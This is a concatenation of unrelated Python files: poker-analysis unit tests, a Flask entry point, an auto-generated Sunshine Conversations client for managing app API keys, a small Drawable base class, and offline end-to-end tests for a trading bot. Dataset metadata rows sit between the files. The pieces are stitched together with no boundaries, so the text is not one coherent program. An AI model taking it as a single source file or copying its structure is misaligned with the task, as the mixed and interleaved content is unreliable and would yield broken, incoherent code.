def test_self_dbetter(self):
# folder containing the expected answers
folder = f + '/testy/rece/'
file = 'in2gr3r__F__XXBCC__T__BRFF.txt'
with open(folder + file) as data:
hand = Reka(data.readlines())
street, player = 'flop', 'sf'
tmp = FacingOpp(hand, street, player)
self.assertEqual(None, tmp._dbetter(),
msg=file + ' ' + street + ' ' + player)
street, player = 'turn', 'sf'
tmp = FacingOpp(hand, street, player)
self.assertEqual('sf', tmp._dbetter(),
msg=file + ' ' + street + ' ' + player)
def test_self_cbetter(self):
# folder containing the expected answers
folder = f + '/testy/rece/'
file = 'in2gr3r__F__XXBCC__T__BRFF.txt'
with open(folder + file) as data:
hand = Reka(data.readlines())
street, player = 'flop', 'sf'
tmp = FacingOpp(hand, street, player)
self.assertEqual(None, tmp._cbetter(street),
msg=file + ' ' + street + ' ' + player)
file = 'in1gr3r__F__BRCF.txt'
with open(folder + file) as data:
hand = Reka(data.readlines())
street, player = 'flop', 'sf'
tmp = FacingOpp(hand, street, player)
self.assertEqual('sf', tmp._cbetter(street),
msg=file + ' ' + street + ' ' + player)
file = 'in1gr3r__F__BCF__T__BC.txt'
with open(folder + file) as data:
hand = Reka(data.readlines())
street, player = 'turn', 'sf'
tmp = FacingOpp(hand, street, player)
self.assertEqual('sf', tmp._cbetter(street),
msg=file + ' ' + street + ' ' + player)
def test_self_vs_mcb_better(self):
# folder containing the expected answers
folder = f + '/testy/rece/'
file = 'in1gr3r__F__XXBCC.txt'
with open(folder + file) as data:
hand = Reka(data.readlines())
street, player = 'flop', 'sf'
tmp = FacingOpp(hand, street, player)
self.assertEqual('kr', tmp._vs_mcb_better(),
msg=file + ' ' + street + ' ' + player)
file = 'in2gr3r__F__XXX__T__BRFC.txt'
with open(folder + file) as data:
hand = Reka(data.readlines())
street, player = 'turn', 'sf'
tmp = FacingOpp(hand, street, player)
self.assertEqual('sf', tmp._vs_mcb_better(),
msg=file + ' ' + street + ' ' + player)
def test_self_floater(self):
# folder containing the expected answers
folder = f + '/testy/rece/'
file = 'in1gr2r__F__BC__T__XBC.txt'
with open(folder + file) as data:
hand = Reka(data.readlines())
street, player = 'turn', 'sf'
tmp = FacingOpp(hand, street, player)
self.assertEqual('zw', tmp._floater(street),
msg=file + ' ' + street + ' ' + player)
file = 'in2gr3r__F__XBFC__T__XX__R__BRF.txt'
with open(folder + file) as data:
hand = Reka(data.readlines())
street, player = 'river', 'sf'
tmp = FacingOpp(hand, street, player)
self.assertEqual('sf', tmp._floater(street),
msg=file + ' ' + street + ' ' + player)
def test_self_plr_missed_cbet(self):
# folder containing the expected answers
folder = f + '/testy/rece/'
file = 'in1gr2r__F__XX.txt'
with open(folder + file) as data:
hand = Reka(data.readlines())
street, player = 'flop', 'sf'
tmp = FacingOpp(hand, street, player)
self.assertEqual('sf', tmp._plr_missed_cbet(street),
msg=file + ' ' + street + ' ' + player)
file = 'in0gr2r__F__XX.txt'
with open(folder + file) as data:
hand = Reka(data.readlines())
street, player = 'river', 'sf'
tmp = FacingOpp(hand, street, player)
self.assertEqual(None, tmp._plr_missed_cbet(street),
msg=file + ' ' + street + ' ' + player)
if __name__ == '__main__':
unittest.main()
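The suite above repeats the same load-then-assert pattern hundreds of times. A sketch of how that could be factored with `unittest.subTest`, so every street/player case reports independently from one test method. `Reka` and `Float` are stubbed here only to make the sketch self-contained; in the real suite they come from the module under test, and the hand would be read from the fixture file rather than constructed empty.

```python
import unittest

# Stand-in stubs so this sketch runs on its own; the real Reka/Float
# classes come from the module under test.
class Reka:
    def __init__(self, lines):
        self.lines = lines

class Float:
    def __init__(self, hand, street, player):
        self.hand, self.street, self.player = hand, street, player

    def enum_float_raise_def(self):
        return None  # stub: the real class derives this from the hand history

class TestFloatParametrized(unittest.TestCase):
    def check_cases(self, hand, label, cases):
        # cases: iterable of (street, player, expected) triples; each one
        # becomes an independently reported subTest.
        for street, player, expected in cases:
            with self.subTest(file=label, street=street, player=player):
                tmp = Float(hand, street, player)
                self.assertEqual(expected, tmp.enum_float_raise_def())

    def test_enum_float_raise_def(self):
        hand = Reka([])  # real tests would read the hand-history file here
        self.check_cases(hand, 'example.txt', [
            ('flop', 'sf', None),
            ('river', 'zw', None),
        ])
```

With `subTest`, a failing case still identifies the file, street, and player in its report, so the explicit `msg=file + ' ' + strt + ' ' + plr` strings become unnecessary.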
# --- main.py (repo: Eswaraprasadp/Fraud-Detection, license: MIT) ---
from application import app
@app.shell_context_processor
def make_shell_context():
    # Flask expects a dict of names to pre-load into the `flask shell`
    # namespace; a bare `return` (None) would raise at shell startup.
    return {'app': app}  # minimal context; extend with models as needed
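For illustration, a Flask-free mimic of what `@app.shell_context_processor` does: registered callables are invoked when `flask shell` starts and their returned dicts are merged into the interactive namespace. `ShellApp` and `build_shell_context` are hypothetical names for this sketch, not Flask's API.

```python
# Minimal registry mimicking Flask's shell-context mechanism.
class ShellApp:
    def __init__(self):
        self._processors = []

    def shell_context_processor(self, func):
        # Register func and return it unchanged, like Flask's decorator.
        self._processors.append(func)
        return func

    def build_shell_context(self):
        # Merge every registered processor's dict into one namespace.
        ctx = {}
        for func in self._processors:
            ctx.update(func())
        return ctx

app = ShellApp()

@app.shell_context_processor
def make_shell_context():
    return {'app': app}
```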
# --- sunshine_conversations_client/api/app_keys_api.py (repo: Dima2022/sunshine-conversations-python, license: Apache-2.0) ---
# coding: utf-8
"""
Sunshine Conversations API
The version of the OpenAPI document: 9.4.5
Generated by: https://openapi-generator.tech
"""
from __future__ import absolute_import
import re # noqa: F401
# python 2 and python 3 compatibility library
import six
from sunshine_conversations_client.api_client import ApiClient
from sunshine_conversations_client.exceptions import ( # noqa: F401
ApiTypeError,
ApiValueError
)
class AppKeysApi(object):
"""NOTE: This class is auto generated by OpenAPI Generator
Ref: https://openapi-generator.tech
Do not edit the class manually.
"""
def __init__(self, api_client=None):
if api_client is None:
api_client = ApiClient()
self.api_client = api_client
def create_app_key(self, app_id, app_key_create_body, **kwargs): # noqa: E501
"""Create App Key # noqa: E501
Creates an API key for the specified app. The response body will include a secret as well as its corresponding id, which you can use to generate JSON Web Tokens to securely make API calls on behalf of the app. # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.create_app_key(app_id, app_key_create_body, async_req=True)
>>> result = thread.get()
:param async_req bool: execute request asynchronously
:param str app_id: Identifies the app. (required)
:param AppKeyCreateBody app_key_create_body: (required)
:param _preload_content: if False, the urllib3.HTTPResponse object will
be returned without reading/decoding response
data. Default is True.
:param _request_timeout: timeout setting for this request. If one
number provided, it will be total request
timeout. It can also be a pair (tuple) of
(connection, read) timeouts.
:return: AppKeyResponse
If the method is called asynchronously,
returns the request thread.
"""
kwargs['_return_http_data_only'] = True
return self.create_app_key_with_http_info(app_id, app_key_create_body, **kwargs) # noqa: E501
def create_app_key_with_http_info(self, app_id, app_key_create_body, **kwargs): # noqa: E501
"""Create App Key # noqa: E501
Creates an API key for the specified app. The response body will include a secret as well as its corresponding id, which you can use to generate JSON Web Tokens to securely make API calls on behalf of the app. # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.create_app_key_with_http_info(app_id, app_key_create_body, async_req=True)
>>> result = thread.get()
:param async_req bool: execute request asynchronously
:param str app_id: Identifies the app. (required)
:param AppKeyCreateBody app_key_create_body: (required)
:param _return_http_data_only: response data without head status code
and headers
:param _preload_content: if False, the urllib3.HTTPResponse object will
be returned without reading/decoding response
data. Default is True.
:param _request_timeout: timeout setting for this request. If one
number provided, it will be total request
timeout. It can also be a pair (tuple) of
(connection, read) timeouts.
:return: tuple(AppKeyResponse, status_code(int), headers(HTTPHeaderDict))
If the method is called asynchronously,
returns the request thread.
"""
local_var_params = locals()
all_params = [
'app_id',
'app_key_create_body'
]
all_params.extend(
[
'async_req',
'_return_http_data_only',
'_preload_content',
'_request_timeout'
]
)
for key, val in six.iteritems(local_var_params['kwargs']):
if key not in all_params:
raise ApiTypeError(
"Got an unexpected keyword argument '%s'"
" to method create_app_key" % key
)
local_var_params[key] = val
del local_var_params['kwargs']
# verify the required parameter 'app_id' is set
if self.api_client.client_side_validation and ('app_id' not in local_var_params or # noqa: E501
local_var_params['app_id'] is None): # noqa: E501
raise ApiValueError("Missing the required parameter `app_id` when calling `create_app_key`") # noqa: E501
# verify the required parameter 'app_key_create_body' is set
if self.api_client.client_side_validation and ('app_key_create_body' not in local_var_params or # noqa: E501
local_var_params['app_key_create_body'] is None): # noqa: E501
raise ApiValueError("Missing the required parameter `app_key_create_body` when calling `create_app_key`") # noqa: E501
collection_formats = {}
path_params = {}
if 'app_id' in local_var_params:
path_params['appId'] = local_var_params['app_id'] # noqa: E501
query_params = []
header_params = {}
form_params = []
local_var_files = {}
body_params = None
if 'app_key_create_body' in local_var_params:
body_params = local_var_params['app_key_create_body']
# HTTP header `Accept`
header_params['Accept'] = self.api_client.select_header_accept(
['application/json']) # noqa: E501
# HTTP header `Content-Type`
header_params['Content-Type'] = self.api_client.select_header_content_type( # noqa: E501
['application/json']) # noqa: E501
# Authentication setting
auth_settings = ['basicAuth', 'bearerAuth'] # noqa: E501
return self.api_client.call_api(
'/v2/apps/{appId}/keys', 'POST',
path_params,
query_params,
header_params,
body=body_params,
post_params=form_params,
files=local_var_files,
response_type='AppKeyResponse', # noqa: E501
auth_settings=auth_settings,
async_req=local_var_params.get('async_req'),
_return_http_data_only=local_var_params.get('_return_http_data_only'), # noqa: E501
_preload_content=local_var_params.get('_preload_content', True),
_request_timeout=local_var_params.get('_request_timeout'),
collection_formats=collection_formats)
def delete_app_key(self, app_id, key_id, **kwargs): # noqa: E501
"""Delete App Key # noqa: E501
Removes an API key. # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.delete_app_key(app_id, key_id, async_req=True)
>>> result = thread.get()
:param async_req bool: execute request asynchronously
:param str app_id: Identifies the app. (required)
:param str key_id: The id of the key. (required)
:param _preload_content: if False, the urllib3.HTTPResponse object will
be returned without reading/decoding response
data. Default is True.
:param _request_timeout: timeout setting for this request. If one
number provided, it will be total request
timeout. It can also be a pair (tuple) of
(connection, read) timeouts.
:return: object
If the method is called asynchronously,
returns the request thread.
"""
kwargs['_return_http_data_only'] = True
return self.delete_app_key_with_http_info(app_id, key_id, **kwargs) # noqa: E501
def delete_app_key_with_http_info(self, app_id, key_id, **kwargs): # noqa: E501
"""Delete App Key # noqa: E501
Removes an API key. # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.delete_app_key_with_http_info(app_id, key_id, async_req=True)
>>> result = thread.get()
:param async_req bool: execute request asynchronously
:param str app_id: Identifies the app. (required)
:param str key_id: The id of the key. (required)
:param _return_http_data_only: return the response data only, without
the HTTP status code and headers
:param _preload_content: if False, the urllib3.HTTPResponse object will
be returned without reading/decoding response
data. Default is True.
:param _request_timeout: timeout setting for this request. If one
number is provided, it will be the total request
timeout. It can also be a pair (tuple) of
(connection, read) timeouts.
:return: tuple(object, status_code(int), headers(HTTPHeaderDict))
If the method is called asynchronously,
returns the request thread.
"""
local_var_params = locals()
all_params = [
'app_id',
'key_id'
]
all_params.extend(
[
'async_req',
'_return_http_data_only',
'_preload_content',
'_request_timeout'
]
)
for key, val in six.iteritems(local_var_params['kwargs']):
if key not in all_params:
raise ApiTypeError(
"Got an unexpected keyword argument '%s'"
" to method delete_app_key" % key
)
local_var_params[key] = val
del local_var_params['kwargs']
# verify the required parameter 'app_id' is set
if self.api_client.client_side_validation and ('app_id' not in local_var_params or # noqa: E501
local_var_params['app_id'] is None): # noqa: E501
raise ApiValueError("Missing the required parameter `app_id` when calling `delete_app_key`") # noqa: E501
# verify the required parameter 'key_id' is set
if self.api_client.client_side_validation and ('key_id' not in local_var_params or # noqa: E501
local_var_params['key_id'] is None): # noqa: E501
raise ApiValueError("Missing the required parameter `key_id` when calling `delete_app_key`") # noqa: E501
collection_formats = {}
path_params = {}
if 'app_id' in local_var_params:
path_params['appId'] = local_var_params['app_id'] # noqa: E501
if 'key_id' in local_var_params:
path_params['keyId'] = local_var_params['key_id'] # noqa: E501
query_params = []
header_params = {}
form_params = []
local_var_files = {}
body_params = None
# HTTP header `Accept`
header_params['Accept'] = self.api_client.select_header_accept(
['application/json']) # noqa: E501
# Authentication setting
auth_settings = ['basicAuth', 'bearerAuth'] # noqa: E501
return self.api_client.call_api(
'/v2/apps/{appId}/keys/{keyId}', 'DELETE',
path_params,
query_params,
header_params,
body=body_params,
post_params=form_params,
files=local_var_files,
response_type='object', # noqa: E501
auth_settings=auth_settings,
async_req=local_var_params.get('async_req'),
_return_http_data_only=local_var_params.get('_return_http_data_only'), # noqa: E501
_preload_content=local_var_params.get('_preload_content', True),
_request_timeout=local_var_params.get('_request_timeout'),
collection_formats=collection_formats)
def get_app_key(self, app_id, key_id, **kwargs): # noqa: E501
"""Get App Key # noqa: E501
Returns an API key. # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.get_app_key(app_id, key_id, async_req=True)
>>> result = thread.get()
:param async_req bool: execute request asynchronously
:param str app_id: Identifies the app. (required)
:param str key_id: The id of the key. (required)
:param _preload_content: if False, the urllib3.HTTPResponse object will
be returned without reading/decoding response
data. Default is True.
:param _request_timeout: timeout setting for this request. If one
number is provided, it will be the total request
timeout. It can also be a pair (tuple) of
(connection, read) timeouts.
:return: AppKeyResponse
If the method is called asynchronously,
returns the request thread.
"""
kwargs['_return_http_data_only'] = True
return self.get_app_key_with_http_info(app_id, key_id, **kwargs) # noqa: E501
def get_app_key_with_http_info(self, app_id, key_id, **kwargs): # noqa: E501
"""Get App Key # noqa: E501
Returns an API key. # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.get_app_key_with_http_info(app_id, key_id, async_req=True)
>>> result = thread.get()
:param async_req bool: execute request asynchronously
:param str app_id: Identifies the app. (required)
:param str key_id: The id of the key. (required)
:param _return_http_data_only: return the response data only, without
the HTTP status code and headers
:param _preload_content: if False, the urllib3.HTTPResponse object will
be returned without reading/decoding response
data. Default is True.
:param _request_timeout: timeout setting for this request. If one
number is provided, it will be the total request
timeout. It can also be a pair (tuple) of
(connection, read) timeouts.
:return: tuple(AppKeyResponse, status_code(int), headers(HTTPHeaderDict))
If the method is called asynchronously,
returns the request thread.
"""
local_var_params = locals()
all_params = [
'app_id',
'key_id'
]
all_params.extend(
[
'async_req',
'_return_http_data_only',
'_preload_content',
'_request_timeout'
]
)
for key, val in six.iteritems(local_var_params['kwargs']):
if key not in all_params:
raise ApiTypeError(
"Got an unexpected keyword argument '%s'"
" to method get_app_key" % key
)
local_var_params[key] = val
del local_var_params['kwargs']
# verify the required parameter 'app_id' is set
if self.api_client.client_side_validation and ('app_id' not in local_var_params or # noqa: E501
local_var_params['app_id'] is None): # noqa: E501
raise ApiValueError("Missing the required parameter `app_id` when calling `get_app_key`") # noqa: E501
# verify the required parameter 'key_id' is set
if self.api_client.client_side_validation and ('key_id' not in local_var_params or # noqa: E501
local_var_params['key_id'] is None): # noqa: E501
raise ApiValueError("Missing the required parameter `key_id` when calling `get_app_key`") # noqa: E501
collection_formats = {}
path_params = {}
if 'app_id' in local_var_params:
path_params['appId'] = local_var_params['app_id'] # noqa: E501
if 'key_id' in local_var_params:
path_params['keyId'] = local_var_params['key_id'] # noqa: E501
query_params = []
header_params = {}
form_params = []
local_var_files = {}
body_params = None
# HTTP header `Accept`
header_params['Accept'] = self.api_client.select_header_accept(
['application/json']) # noqa: E501
# Authentication setting
auth_settings = ['basicAuth', 'bearerAuth'] # noqa: E501
return self.api_client.call_api(
'/v2/apps/{appId}/keys/{keyId}', 'GET',
path_params,
query_params,
header_params,
body=body_params,
post_params=form_params,
files=local_var_files,
response_type='AppKeyResponse', # noqa: E501
auth_settings=auth_settings,
async_req=local_var_params.get('async_req'),
_return_http_data_only=local_var_params.get('_return_http_data_only'), # noqa: E501
_preload_content=local_var_params.get('_preload_content', True),
_request_timeout=local_var_params.get('_request_timeout'),
collection_formats=collection_formats)
def list_app_keys(self, app_id, **kwargs): # noqa: E501
"""List App Keys # noqa: E501
Lists all API keys for a given app. # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.list_app_keys(app_id, async_req=True)
>>> result = thread.get()
:param async_req bool: execute request asynchronously
:param str app_id: Identifies the app. (required)
:param _preload_content: if False, the urllib3.HTTPResponse object will
be returned without reading/decoding response
data. Default is True.
:param _request_timeout: timeout setting for this request. If one
number is provided, it will be the total request
timeout. It can also be a pair (tuple) of
(connection, read) timeouts.
:return: AppKeyListResponse
If the method is called asynchronously,
returns the request thread.
"""
kwargs['_return_http_data_only'] = True
return self.list_app_keys_with_http_info(app_id, **kwargs) # noqa: E501
def list_app_keys_with_http_info(self, app_id, **kwargs): # noqa: E501
"""List App Keys # noqa: E501
Lists all API keys for a given app. # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.list_app_keys_with_http_info(app_id, async_req=True)
>>> result = thread.get()
:param async_req bool: execute request asynchronously
:param str app_id: Identifies the app. (required)
:param _return_http_data_only: return the response data only, without
the HTTP status code and headers
:param _preload_content: if False, the urllib3.HTTPResponse object will
be returned without reading/decoding response
data. Default is True.
:param _request_timeout: timeout setting for this request. If one
number is provided, it will be the total request
timeout. It can also be a pair (tuple) of
(connection, read) timeouts.
:return: tuple(AppKeyListResponse, status_code(int), headers(HTTPHeaderDict))
If the method is called asynchronously,
returns the request thread.
"""
local_var_params = locals()
all_params = [
'app_id'
]
all_params.extend(
[
'async_req',
'_return_http_data_only',
'_preload_content',
'_request_timeout'
]
)
for key, val in six.iteritems(local_var_params['kwargs']):
if key not in all_params:
raise ApiTypeError(
"Got an unexpected keyword argument '%s'"
" to method list_app_keys" % key
)
local_var_params[key] = val
del local_var_params['kwargs']
# verify the required parameter 'app_id' is set
if self.api_client.client_side_validation and ('app_id' not in local_var_params or # noqa: E501
local_var_params['app_id'] is None): # noqa: E501
raise ApiValueError("Missing the required parameter `app_id` when calling `list_app_keys`") # noqa: E501
collection_formats = {}
path_params = {}
if 'app_id' in local_var_params:
path_params['appId'] = local_var_params['app_id'] # noqa: E501
query_params = []
header_params = {}
form_params = []
local_var_files = {}
body_params = None
# HTTP header `Accept`
header_params['Accept'] = self.api_client.select_header_accept(
['application/json']) # noqa: E501
# Authentication setting
auth_settings = ['basicAuth', 'bearerAuth'] # noqa: E501
return self.api_client.call_api(
'/v2/apps/{appId}/keys', 'GET',
path_params,
query_params,
header_params,
body=body_params,
post_params=form_params,
files=local_var_files,
response_type='AppKeyListResponse', # noqa: E501
auth_settings=auth_settings,
async_req=local_var_params.get('async_req'),
_return_http_data_only=local_var_params.get('_return_http_data_only'), # noqa: E501
_preload_content=local_var_params.get('_preload_content', True),
_request_timeout=local_var_params.get('_request_timeout'),
collection_formats=collection_formats)
| 44.705545 | 234 | 0.589752 | 2,722 | 23,381 | 4.801249 | 0.074578 | 0.044686 | 0.064274 | 0.027546 | 0.939475 | 0.934961 | 0.930829 | 0.92356 | 0.914684 | 0.913612 | 0 | 0.015663 | 0.33647 | 23,381 | 522 | 235 | 44.791188 | 0.826737 | 0.44472 | 0 | 0.722892 | 1 | 0 | 0.177036 | 0.033313 | 0 | 0 | 0 | 0 | 0 | 1 | 0.036145 | false | 0 | 0.02008 | 0 | 0.092369 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 1 | 1 | 1 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 1 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 8 |
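Every method in this generated client repeats the same kwargs-validation idiom before building the request: iterate over the caller's keyword arguments and reject any name not declared in `all_params`. A stripped-down, self-contained sketch of that pattern (the client's `ApiTypeError` is replaced by the built-in `TypeError` here, and the method name and parameter list are stand-ins for the values the code generator bakes in):

```python
def validate_kwargs(method_name, all_params, **kwargs):
    """Reject any keyword argument the generated method does not declare.

    Mirrors the loop the generated client runs over
    local_var_params['kwargs'] before issuing the HTTP call.
    """
    local_var_params = {}
    for key, val in kwargs.items():
        if key not in all_params:
            raise TypeError(
                "Got an unexpected keyword argument '%s'"
                " to method %s" % (key, method_name))
        local_var_params[key] = val
    return local_var_params

# Declared parameters pass through; anything else raises immediately.
ok = validate_kwargs('delete_app_key',
                     ['app_id', 'key_id', 'async_req', '_request_timeout'],
                     async_req=True)
print(ok)  # -> {'async_req': True}
```

Because the check runs before any network I/O, a typo such as `asynch_req=True` fails fast instead of being silently ignored.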
091abc6660de1bf2e9d0825b4d1721e249b93d7d | 189 | py | Python | src/Drawable.py | oerpli/TUD15-Snake | 00804fcc14d06bcc6e835c3182d8fdb720b34713 | [
"MIT"
] | null | null | null | src/Drawable.py | oerpli/TUD15-Snake | 00804fcc14d06bcc6e835c3182d8fdb720b34713 | [
"MIT"
] | null | null | null | src/Drawable.py | oerpli/TUD15-Snake | 00804fcc14d06bcc6e835c3182d8fdb720b34713 | [
"MIT"
] | null | null | null | class Drawable:
def __init__(self):
pass
def InitDrawer(self, drawer):
self.__drawer = drawer
def GetDrawer(self):
return self.__drawer
def Draw(self):
raise NotImplementedError | 21 | 29 | 0.751323 | 24 | 189 | 5.583333 | 0.541667 | 0.223881 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.15873 | 189 | 9 | 30 | 21 | 0.842767 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.444444 | false | 0.111111 | 0 | 0.111111 | 0.666667 | 0 | 1 | 0 | 0 | null | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 1 | 0 | 1 | 1 | 0 | 0 | 7 |
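A short usage sketch for the `Drawable` base class above. The `Circle` subclass and the `'console'` drawer value are hypothetical, and `Drawable` is restated (with indentation) so the snippet runs on its own:

```python
class Drawable:  # restated from src/Drawable.py above
    def __init__(self):
        pass

    def InitDrawer(self, drawer):
        self.__drawer = drawer

    def GetDrawer(self):
        return self.__drawer

    def Draw(self):
        raise NotImplementedError


class Circle(Drawable):  # hypothetical concrete subclass
    def __init__(self, radius):
        super().__init__()
        self.radius = radius

    def Draw(self):
        # Render through whatever backend was attached via InitDrawer().
        return 'circle r=%d via %s' % (self.radius, self.GetDrawer())


c = Circle(3)
c.InitDrawer('console')  # any drawer backend object would do
print(c.Draw())          # -> circle r=3 via console
```

Calling `Draw()` on the base class itself raises `NotImplementedError`, which is the contract the base class enforces on subclasses.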
091b0f203bac4a89cd37cc434d3a9e7245d89bcb | 10,150 | py | Python | tests/test_offline.py | ztomsy/tribot | b5e7fb17368eb37bf5a321d0215c245e16e804e2 | [
"BSD-2-Clause"
] | 5 | 2021-03-24T15:49:10.000Z | 2021-11-08T17:21:50.000Z | tests/test_offline.py | ztomsy/tribot | b5e7fb17368eb37bf5a321d0215c245e16e804e2 | [
"BSD-2-Clause"
] | 3 | 2020-02-27T18:52:29.000Z | 2021-01-09T12:16:58.000Z | tests/test_offline.py | ztomsy/tribot | b5e7fb17368eb37bf5a321d0215c245e16e804e2 | [
"BSD-2-Clause"
] | 3 | 2020-05-12T14:11:04.000Z | 2021-08-12T00:56:41.000Z | # -*- coding: utf-8 -*-
import unittest
from subprocess import call
import tkgtri.analyzer as ta
from .context import tkgtri
# TODO: tests for reports-directory creation
class TriOfflineTestSuite(unittest.TestCase):
""" TriBot Cli tests"""
@staticmethod
def _run_bot_offine(cli):
"""
Runs the bot offline via the CLI, then returns the deal loaded from the
CSV result file _test/test.csv.
:param cli: CLI parameters for the bot
:return: tkgtri.analyzer.Deal object
"""
call("python3 tribot.py {}".format(cli), shell=True)
deal = ta.Deal()
deal.load_from_csv("_test/test.csv", "test")
return deal
def test_e2e_general_mode(self):
"""
Order books from ticker; result is good. start-qty should shrink to share_balance_to_bid * balance.
:return:
"""
cli = "--balance 1 offline --test"
deal = self._run_bot_offine(cli)
self.assertEqual(float(deal.data_row["balance"]) * float(deal.data_row["_config_share_balance_to_bid"]),
float(deal.data_row["start-qty"]))
self.assertEqual(0.8, float(deal.data_row["start-qty"]))
self.assertEqual(0.03883667000000002, float(deal.data_row["result-fact-diff"]))
def test_e2e_general_mode_yml_config(self):
"""
Order books from ticker; result is good. start-qty should shrink to share_balance_to_bid * balance.
:return:
"""
cli = "--config _config_default.yml --balance 1 offline --test"
deal = self._run_bot_offine(cli)
self.assertEqual(float(deal.data_row["balance"]) * float(deal.data_row["_config_share_balance_to_bid"]),
float(deal.data_row["start-qty"]))
self.assertEqual(0.8, float(deal.data_row["start-qty"]))
self.assertEqual(0.03883667000000002, float(deal.data_row["result-fact-diff"]))
self.assertEqual("PROD1_YML", deal.data_row["server-id"])
def test_e2e_order_book_amount_less_than_max_bal(self):
"""
Order books from ticker; result is good.
1st leg order book depth = 2
:return:
"""
cli = "--balance 1 offline --test -ob test_data/order_books.csv"
deal = self._run_bot_offine(cli)
self.assertAlmostEqual(0.06000734789047485, float(deal.data_row["start-qty"]), 4)
self.assertEqual(0.002407822109525136, float(deal.data_row["result-fact-diff"]))
# prices from order book
self.assertNotEqual(float(deal.data_row["leg1-price"]), float(deal.data_row["leg1-ob-price"]))
def test_e2e_override_depth_amount_greater_than_from_order_book(self):
"""
In this case override_depth_amount is greater than the amount from the order book, so the start quantity
should be taken from override_depth_amount.
Prices should be taken from the tickers.
"""
cli = "--balance 1 --override_depth_amount 0.5 offline --test -ob test_data/order_books.csv "
deal = self._run_bot_offine(cli)
self.assertEqual(0.5, float(deal.data_row["_config_override_depth_amount"]), 4)
self.assertEqual(0.5, float(deal.data_row["start-qty"]))
self.assertEqual(float(deal.data_row["ob_result"]), float(deal.data_row["result"]))
self.assertEqual(0.024282400000000093, float(deal.data_row["result-fact-diff"]))
# check if prices are from tickers
self.assertEqual(float(deal.data_row["leg1-price"]), float(deal.data_row["leg1-ob-price"]))
self.assertEqual(float(deal.data_row["leg2-price"]), float(deal.data_row["leg2-ob-price"]))
self.assertEqual(float(deal.data_row["leg3-price"]), float(deal.data_row["leg3-ob-price"]))
def test_e2e_override_depth_amount_less_than_from_order_book(self):
"""
In this case override_depth_amount is less than the amount from the order book, so the start quantity
should be taken from the order book. Results should equal those of test_e2e_order_book_amount_less_than_max_bal.
Prices should be taken from the order books.
"""
cli = "--balance 1 --override_depth_amount 0.03 offline --test -ob test_data/order_books.csv "
deal = self._run_bot_offine(cli)
self.assertAlmostEqual(0.06000734789047485, float(deal.data_row["start-qty"]), 4)
self.assertEqual(0.002407822109525136, float(deal.data_row["result-fact-diff"]))
# prices from order book
self.assertNotEqual(float(deal.data_row["leg1-price"]), float(deal.data_row["leg1-ob-price"]))
def test_e2e_override_depth_amount_greater_than_max_allowed_from_balance(self):
"""
Case: override_depth_amount is greater than both the max share of balance to bid and the amount from the order book.
Prices should be taken from the tickers.
:return:
"""
cli = "--balance 0.5 --override_depth_amount 0.5 offline --test -ob test_data/order_books.csv "
deal = self._run_bot_offine(cli)
self.assertEqual(0.5*0.8, float(deal.data_row["start-qty"]))
# check if prices are from tickers
self.assertEqual(float(deal.data_row["leg1-price"]), float(deal.data_row["leg1-ob-price"]))
self.assertEqual(float(deal.data_row["leg2-price"]), float(deal.data_row["leg2-ob-price"]))
self.assertEqual(float(deal.data_row["leg3-price"]), float(deal.data_row["leg3-ob-price"]))
def test_skip_order_books_start_amount_max_from_balance(self):
cli = "--balance 1 --skip_order_books offline --test -ob test_data/order_books.csv "
deal = self._run_bot_offine(cli)
self.assertEqual(0.8, float(deal.data_row["start-qty"]))
# check if prices are from tickers
self.assertEqual(float(deal.data_row["leg1-price"]), float(deal.data_row["leg1-ob-price"]))
self.assertEqual(float(deal.data_row["leg2-price"]), float(deal.data_row["leg2-ob-price"]))
self.assertEqual(float(deal.data_row["leg3-price"]), float(deal.data_row["leg3-ob-price"]))
def test_skip_order_books_override_depth_amount(self):
cli = "--balance 1 --skip_order_books --override_depth_amount 0.5 offline --test -ob test_data/order_books.csv "
deal = self._run_bot_offine(cli)
self.assertEqual(0.5, float(deal.data_row["start-qty"]))
self.assertEqual(0.024282400000000093, float(deal.data_row["result-fact-diff"]))
# check if prices are from tickers
self.assertEqual(float(deal.data_row["leg1-price"]), float(deal.data_row["leg1-ob-price"]))
self.assertEqual(float(deal.data_row["leg2-price"]), float(deal.data_row["leg2-ob-price"]))
self.assertEqual(float(deal.data_row["leg3-price"]), float(deal.data_row["leg3-ob-price"]))
def test_skip_order_books_general(self):
cli = "--balance 1 --skip_order_books offline --test -ob test_data/order_books.csv "
deal = self._run_bot_offine(cli)
self.assertEqual(0.8, float(deal.data_row["start-qty"]))
self.assertEqual(0.03883667000000002, float(deal.data_row["result-fact-diff"]))
# check if prices are from tickers
self.assertEqual(float(deal.data_row["leg1-price"]), float(deal.data_row["leg1-ob-price"]))
self.assertEqual(float(deal.data_row["leg2-price"]), float(deal.data_row["leg2-ob-price"]))
self.assertEqual(float(deal.data_row["leg3-price"]), float(deal.data_row["leg3-ob-price"]))
def test_skip_order_books_force_start_bid(self):
cli = "--balance 1 --skip_order_books --force_start_bid 0.1 offline --test -ob test_data/order_books.csv "
deal = self._run_bot_offine(cli)
self.assertEqual(0.1, float(deal.data_row["start-qty"]))
